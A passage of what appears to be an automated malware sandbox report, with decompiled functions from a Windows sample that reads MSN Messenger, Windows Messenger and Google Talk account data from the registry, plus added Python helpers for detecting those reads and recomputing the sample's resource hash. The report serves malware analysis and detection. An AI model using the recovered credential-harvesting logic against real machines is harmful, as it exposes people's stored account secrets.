                                                  							if(_t23 != 0) {
                                                  								goto L5;
                                                  							} else {
                                                  								_t24 =  &_v1060;
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                  						if(_t26 != 0) {
                                                  							L5:
                                                  							_t21 = 0;
                                                  						} else {
                                                  							_t24 =  &_v1056;
                                                  							L4:
                                                  							_t21 = E0040D4A6( &_v1052, _t24);
                                                  						}
                                                  					}
                                                  					_t32 = 0;
                                                  					if(_t21 != 0) {
                                                  						E004038CF(_t52, _a4,  &_v1052);
                                                  					}
                                                  					_v1064 = _v1064 + 1;
                                                  				} while (_v1064 <= 2);
                                                  				return E004047F1( &_v528);
                                                  			}


                                                  APIs
                                                    • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                    • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                    • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                    • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                    • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                  Strings
                                                  • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                  • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                  • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                  • API String ID: 1910562259-1741179510
                                                  • Opcode ID: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                  • Instruction ID: e1373b66f94ab8684edf5be4eb08dc620599410c0cc400d8dd4f2e2a864aae35
                                                  • Opcode Fuzzy Hash: a042053f0881545de1053e7963e322542f87d6f2c27a3a690180a3307b8871c0
                                                  • Instruction Fuzzy Hash: 4F11F6B1608345AEC320DF5188819ABBBEC9B84355F50893FF584A2081D338DA09CAAB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

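The two functions above open instant-messenger credential stores in the registry: E0040396C iterates over Software\Microsoft\MSNMessenger and Software\Microsoft\MessengerService under HKCU (its third iteration takes a non-registry path through E0040D5DB), and the earlier routine references Software\Google\Google Talk\Accounts. The following triage helper is an added example, not code from the report or from the sample: it parses API-call lines in the format this report uses in its "APIs" lists and flags RegOpenKeyExA calls whose subkey argument is one of those credential-store paths. The watch-list entries are the strings recovered on this page; the parser, the Hit record and the sample trace are constructed here, with the two MSNMessenger/MessengerService lines copied from the report and the remaining lines made up to exercise the other code paths.

```python
"""Flag credential-store registry access in a sandbox API trace.

Added example for this report; not part of the sample or of Joe Sandbox.
Watch-list subkeys come from strings in the decompiled functions above;
the log-line parser and the sample trace are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Predefined hive handles as they appear in the report's argument lists.
HIVES = {0x80000001: "HKCU", 0x80000002: "HKLM"}

# Subkeys the recovered code opens (E0040396C, and the Google Talk routine).
# Keys are compared case-insensitively because the registry is.
CREDENTIAL_KEYS = {
    r"software\microsoft\msnmessenger": "MSN Messenger account data",
    r"software\microsoft\messengerservice": "Windows Messenger account data",
    r"software\google\google talk\accounts": "Google Talk account data",
}

# "• RegOpenKeyExA.KERNELBASE(80000001,Software\...,00000000,00020019,?), ref: 004039C5"
# with an optional "Part of subcall function XXXXXXXX:" prefix, as on this page.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class Hit:
    api: str
    hive: str
    subkey: str
    ref: str          # call-site address from the trace
    description: str


def parse_line(line: str):
    """Split one trace line into (api, module, [args], ref), or None if it is not a call line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")]
    return m["api"], m["module"], args, m["ref"]


def hive_name(token: str) -> str:
    """Map a hex handle token to HKCU/HKLM; unresolved tokens such as '?' pass through."""
    try:
        value = int(token, 16)
    except ValueError:
        return token
    return HIVES.get(value, f"0x{value:08X}")


def find_credential_key_access(lines: List[str]) -> List[Hit]:
    """Return a Hit for every RegOpenKeyEx call whose subkey is on the watch-list."""
    hits: List[Hit] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        api, _module, args, ref = parsed
        # RegOpenKeyEx(hKey, lpSubKey, ulOptions, samDesired, phkResult)
        if api not in ("RegOpenKeyExA", "RegOpenKeyExW") or len(args) < 2:
            continue
        subkey = args[1]
        description: Optional[str] = CREDENTIAL_KEYS.get(subkey.lower())
        if description:
            hits.append(Hit(api, hive_name(args[0]), subkey, ref, description))
    return hits


SAMPLE_TRACE = [
    # Copied from this report's API list for E0040396C:
    r"• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5",
    r"• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7",
    # Constructed lines (not from the report) to exercise the remaining paths:
    r"• RegOpenKeyExA.ADVAPI32(80000001,Software\Google\Google Talk\Accounts,00000000,00020019,?), ref: 00407570",
    r"• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00020019,?), ref: 00401000",
    r"• memset.MSVCRT ref: 0040759B",
]

if __name__ == "__main__":
    for hit in find_credential_key_access(SAMPLE_TRACE):
        print(f"{hit.ref}: {hit.api} {hit.hive}\\{hit.subkey}  ({hit.description})")
```

The matcher only fires when the report resolved the subkey string into the second argument position; where the sandbox could not recover the argument (as in the Shell Folders call listed under the Google Talk routine, whose argument list is scrambled), the line is skipped rather than guessed at, so a miss there is not evidence of absence.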
                                                  C-Code - Quality: 100%
                                                  			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
                                                  				struct HRSRC__* _t12;
                                                  				void* _t16;
                                                  				void* _t17;
                                                  				signed int _t26;
                                                  				signed int _t29;
                                                  				signed int _t33;
                                                  				struct HRSRC__* _t35;
                                                  				signed int _t36;
                                                  
                                                  				_t12 = FindResourceA(_a4, _a12, _a8); // executed
                                                  				_t35 = _t12;
                                                  				if(_t35 != 0) {
                                                  					_t33 = SizeofResource(_a4, _t35);
                                                  					if(_t33 > 0) {
                                                  						_t16 = LoadResource(_a4, _t35);
                                                  						if(_t16 != 0) {
                                                  							_t17 = LockResource(_t16);
                                                  							if(_t17 != 0) {
                                                  								_a4 = _t33;
                                                  								_t29 = _t33 * _t33;
                                                  								_t36 = 0;
                                                  								_t7 =  &_a4;
                                                  								 *_t7 = _a4 >> 2;
                                                  								if( *_t7 != 0) {
                                                  									do {
                                                  										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                  										_t36 = _t36 + 1;
                                                  										_t29 = _t26;
                                                  									} while (_t36 < _a4);
                                                  								}
                                                  								 *0x417110 =  *0x417110 + _t29 ^ _t33;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return 1;
                                                  			}


                                                  APIs
                                                  • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                  • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                  • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                  • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                  • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                  • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

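E0040ED0B locates a resource with FindResourceA/LoadResource/LockResource and folds its contents into a global at 0x417110 with a small custom hash: it seeds the running value with size*size, then for each 32-bit word at index i computes (word*i*size*0x11) ^ (word + h), and finally stores (global + h) ^ size. The reimplementation below is an added example, not code from the sample or the report; it exists so an analyst can recompute the value over an extracted resource. It reads the decompiled C at face value (multiplication before addition before XOR, 32-bit wraparound, trailing bytes past the last whole word ignored); that operator reading and the assumption that the routine is a resource integrity check are mine, not the report's.

```python
"""Reimplementation of the resource hash in E0040ED0B (decompiled above).

Added example for this report, not the sample's own code. It follows the
decompiled arithmetic literally: the resource is walked as little-endian
32-bit words, trailing bytes are dropped, every operation wraps at 32 bits,
and the result is folded into a running accumulator (the global at 0x417110
in the dump). Assumption: C precedence as printed by the decompiler.
"""
import struct

MASK32 = 0xFFFFFFFF


def resource_checksum(data: bytes, accumulator: int = 0) -> int:
    """Return the updated accumulator after hashing one resource blob.

    Mirrors the decompiled loop:
        h = size * size
        for i, w in enumerate(words):   # words = size >> 2 little-endian dwords
            h = (w * i * size * 0x11) ^ (w + h)
        accumulator = (accumulator + h) ^ size
    A zero-length resource leaves the accumulator unchanged, since the
    decompiled code skips the update when SizeofResource() returns 0.
    """
    size = len(data)
    if size == 0:
        return accumulator & MASK32
    h = (size * size) & MASK32
    n_words = size >> 2
    for i in range(n_words):
        (w,) = struct.unpack_from("<I", data, i * 4)
        h = ((w * i * size * 0x11) ^ (w + h)) & MASK32
    return (((accumulator + h) & MASK32) ^ size) & MASK32


def checksum_all(resources, accumulator: int = 0) -> int:
    """Apply the hash to several resources in order, as repeated calls would."""
    for blob in resources:
        accumulator = resource_checksum(blob, accumulator)
    return accumulator


if __name__ == "__main__":
    # Constructed input, not a resource from the sample.
    blob = b"\x01\x00\x00\x00\x02\x00\x00\x00"
    print(hex(resource_checksum(blob)))
```

Because the function ignores any bytes beyond the last whole dword and never checks whether the resource even has the expected type, two resources that differ only in their final one to three bytes hash identically; if you use this to compare a dumped resource against the value the sample computes, compare sizes as well.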
                                                  C-Code - Quality: 95%
                                                  			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
                                                  				void _v8199;
                                                  				char _v8200;
                                                  				void* __ebx;
                                                  				int _t23;
                                                  				CHAR* _t31;
                                                  
                                                  				E004118A0(0x2004, __ecx);
                                                  				_v8200 = 0;
                                                  				if(_a4 == 0) {
                                                  					memset( &_v8199, 0, 0x2000);
                                                  					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
                                                  					_t23 = E004067DC( &_v8200, __edi, _a16);
                                                  				} else {
                                                  					memset( &_v8199, 0, 0x2000);
                                                  					_t31 =  &_v8200;
                                                  					E00406763(_t31, _a16,  *__edi);
                                                  					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
                                                  				}
                                                  				return _t23;
                                                  			}

                                                  APIs
                                                  • memset.MSVCRT ref: 0040EA9A
                                                    • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                    • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                  • memset.MSVCRT ref: 0040EAD5
                                                  • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                  • String ID:
                                                  • API String ID: 3143880245-0
                                                  • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                  • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                  • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                  • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t16;
                                                  				void* _t17;
                                                  				struct HICON__* _t19;
                                                  				intOrPtr* _t23;
                                                  				void* _t25;
                                                  
                                                  				_t23 = __ebx;
                                                  				_t14 = __eax;
                                                  				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                  				 *__ebx = 0x41356c;
                                                  				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                  				_push(0x14);
                                                  				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                  				L004115D0();
                                                  				if(__eax == 0) {
                                                  					_t14 = 0;
                                                  					__eflags = 0;
                                                  				} else {
                                                  					 *0x417114 = __eax;
                                                  				}
                                                  				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
                                                  				L004115D0(); // executed
                                                  				_t32 = _t14;
                                                  				_t25 = 0xf38;
                                                  				if(_t14 == 0) {
                                                  					_t15 = 0;
                                                  					__eflags = 0;
                                                  				} else {
                                                  					_t15 = E00404016(_t14, _t32);
                                                  				}
                                                  				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
                                                  				 *((intOrPtr*)(_t23 + 0x378)) = 0;
                                                  				 *((intOrPtr*)(_t23 + 0x260)) = 0;
                                                  				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
                                                  				 *((intOrPtr*)(_t23 + 0x154)) = 0;
                                                  				_t16 =  *(_t23 + 0x258);
                                                  				if(_t16 != 0) {
                                                  					DeleteObject(_t16);
                                                  					 *(_t23 + 0x258) = 0;
                                                  				}
                                                  				_t17 = E00406252(); // executed
                                                  				 *(_t23 + 0x258) = _t17;
                                                  				E00401000(_t25, _t23 + 0x158, 0x413480);
                                                  				_t19 = LoadIconA( *0x416b94, 0x65); // executed
                                                  				E004017A4(_t23, _t19);
                                                  				return _t23;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$DeleteIconLoadObject
                                                  • String ID:
                                                  • API String ID: 1986663749-0
                                                  • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                  • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                  • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                  • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E00411932() {
                                                  				intOrPtr _t1;
                                                  				intOrPtr _t2;
                                                  				intOrPtr _t3;
                                                  				intOrPtr _t4;
                                                  
                                                  				_t1 =  *0x417528;
                                                  				if(_t1 != 0) {
                                                  					_push(_t1);
                                                  					L004115D6();
                                                  				}
                                                  				_t2 =  *0x417530;
                                                  				if(_t2 != 0) {
                                                  					_push(_t2); // executed
                                                  					L004115D6(); // executed
                                                  				}
                                                  				_t3 =  *0x41752c;
                                                  				if(_t3 != 0) {
                                                  					_push(_t3);
                                                  					L004115D6();
                                                  				}
                                                  				_t4 =  *0x417534;
                                                  				if(_t4 != 0) {
                                                  					_push(_t4); // executed
                                                  					L004115D6(); // executed
                                                  					return _t4;
                                                  				}
                                                  				return _t4;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??3@
                                                  • String ID:
                                                  • API String ID: 613200358-0
                                                  • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                  • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                  • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                  • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 78%
                                                  			E0040787D() {
                                                  				void* _t13;
                                                  				signed int _t16;
                                                  				signed int _t18;
                                                  				signed int _t27;
                                                  				signed int _t29;
                                                  				intOrPtr _t33;
                                                  
                                                  				_t33 =  *0x417540;
                                                  				if(_t33 == 0) {
                                                  					_push(0x8000);
                                                  					 *0x417540 = 0x8000;
                                                  					 *0x417544 = 0x100;
                                                  					 *0x417548 = 0x1000; // executed
                                                  					L004115D0(); // executed
                                                  					 *0x417528 = 0x8000;
                                                  					_t27 = 4;
                                                  					_t16 =  *0x417544 * _t27;
                                                  					_push( ~(0 | _t33 > 0x00000000) | _t16);
                                                  					L004115D0();
                                                  					 *0x417530 = _t16;
                                                  					_t29 = 4;
                                                  					_t18 =  *0x417544 * _t29;
                                                  					_push( ~(0 | _t33 > 0x00000000) | _t18);
                                                  					L004115D0();
                                                  					_push( *0x417548);
                                                  					 *0x417534 = _t18; // executed
                                                  					L004115D0(); // executed
                                                  					 *0x41752c = _t18;
                                                  					return _t18;
                                                  				}
                                                  				return _t13;
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                  • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                  • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                  • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                                  				void* _t8;
                                                  				void* _t13;
                                                  				signed int _t16;
                                                  				void** _t21;
                                                  				signed int _t22;
                                                  
                                                  				_t21 = __edi;
                                                  				_t22 =  *__eax;
                                                  				if(__edx < _t22) {
                                                  					return 0;
                                                  				} else {
                                                  					_t13 =  *__edi;
                                                  					do {
                                                  						 *__eax =  *__eax + _a8;
                                                  						_t16 =  *__eax;
                                                  					} while (__edx >= _t16);
                                                  					_t8 = malloc(_t16 * _a4); // executed
                                                  					 *__edi = _t8;
                                                  					if(_t22 > 0) {
                                                  						if(_t8 != 0) {
                                                  							memcpy(_t8, _t13, _t22 * _a4);
                                                  						}
                                                  						free(_t13);
                                                  					}
                                                  					return 0 |  *_t21 != 0x00000000;
                                                  				}
                                                  			}

                                                  APIs
                                                  • malloc.MSVCRT ref: 00406116
                                                  • memcpy.MSVCRT ref: 0040612E
                                                  • free.MSVCRT(00000000,00000000,74B04DE0,00406B49,00000001,?,00000000,74B04DE0,00406D88,00000000,?,?), ref: 00406137
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: freemallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3056473165-0
                                                  • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                  • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                  • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                  • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E0040B8D7(void* __edi, void* __eflags) {
                                                  				void* __esi;
                                                  				signed int _t24;
                                                  				intOrPtr _t31;
                                                  				intOrPtr _t38;
                                                  				void* _t42;
                                                  				void* _t45;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				intOrPtr _t52;
                                                  
                                                  				_t54 = __eflags;
                                                  				_t49 = __edi;
                                                  				_t38 = 0;
                                                  				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                  				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                  				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                  				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                  				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                  					_t51 = 0x412466;
                                                  				} else {
                                                  					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                  						_t45 = 0;
                                                  						__eflags = 0;
                                                  					} else {
                                                  						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
                                                  					}
                                                  					_t51 = _t45;
                                                  				}
                                                  				_push(_t51);
                                                  				_push("/stext");
                                                  				L004115B2();
                                                  				if(_t24 != 0) {
                                                  					_t52 = E0040B841(_t24, _t51);
                                                  					__eflags = _t52 - _t38;
                                                  					if(_t52 <= _t38) {
                                                  						goto L15;
                                                  					}
                                                  					goto L9;
                                                  				} else {
                                                  					_t52 = 1;
                                                  					L9:
                                                  					E0040AF17(_t49, _t38); // executed
                                                  					E0040A5AC(_t49);
                                                  					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
                                                  					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
                                                  						_t42 = 0x412466;
                                                  					} else {
                                                  						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
                                                  						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                                                  							_t42 = 0;
                                                  						} else {
                                                  							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
                                                  						}
                                                  					}
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
                                                  					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
                                                  					_t38 = 1;
                                                  					E0040B0C2(_t49);
                                                  					L15:
                                                  					return _t38;
                                                  				}
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                    • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                  • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: strlen$_stricmpmemset
                                                  • String ID: /stext
                                                  • API String ID: 3575250601-3817206916
                                                  • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                  • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                  • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                  • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406252() {
                                                  				struct tagLOGFONTA _v64;
                                                  				struct HFONT__* _t6;
                                                  
                                                  				E00406191( &_v64, "Arial", 0xe, 0);
                                                  				_t6 = CreateFontIndirectA( &_v64); // executed
                                                  				return _t6;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                    • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                  • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: CreateFontIndirectmemsetstrcpy
                                                  • String ID: Arial
                                                  • API String ID: 3275230829-493054409
                                                  • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                  • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                  • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                  • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004047A0(CHAR* __esi, void* __eflags) {
                                                  				struct HINSTANCE__* _t8;
                                                  				char _t12;
                                                  				char* _t15;
                                                  				CHAR* _t17;
                                                  
                                                  				_t17 = __esi;
                                                  				E004047F1(__esi);
                                                  				_t8 = LoadLibraryA(__esi); // executed
                                                  				__esi[0x200] = _t8;
                                                  				if(_t8 != 0) {
                                                  					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
                                                  					__esi[0x208] = _t12;
                                                  					if(_t12 != 0) {
                                                  						__esi[0x204] = 1;
                                                  					}
                                                  				}
                                                  				_t15 =  &(_t17[0x204]);
                                                  				if( *_t15 == 0) {
                                                  					E004047F1(_t17);
                                                  				}
                                                  				return  *_t15;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                  • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,75D6F420), ref: 004047A8
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                  • Instruction ID: bd92e302f737a6b7e7c2aa8ed3bd721d1bcdfa8038008227cdd2def65d6b9a1b
                                                  • Opcode Fuzzy Hash: cbabdfec5215e458202f737861f40a15f802b817f3ec498c61102a043c0cc1ea
                                                  • Instruction Fuzzy Hash: F1F039B02007028BD7209F39D84879B77E8BF85700F00853EF266E3281EB78A951CB28
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileIntA.KERNEL32 ref: 0040EB35
                                                    • Part of subcall function 0040EA26: memset.MSVCRT ref: 0040EA44
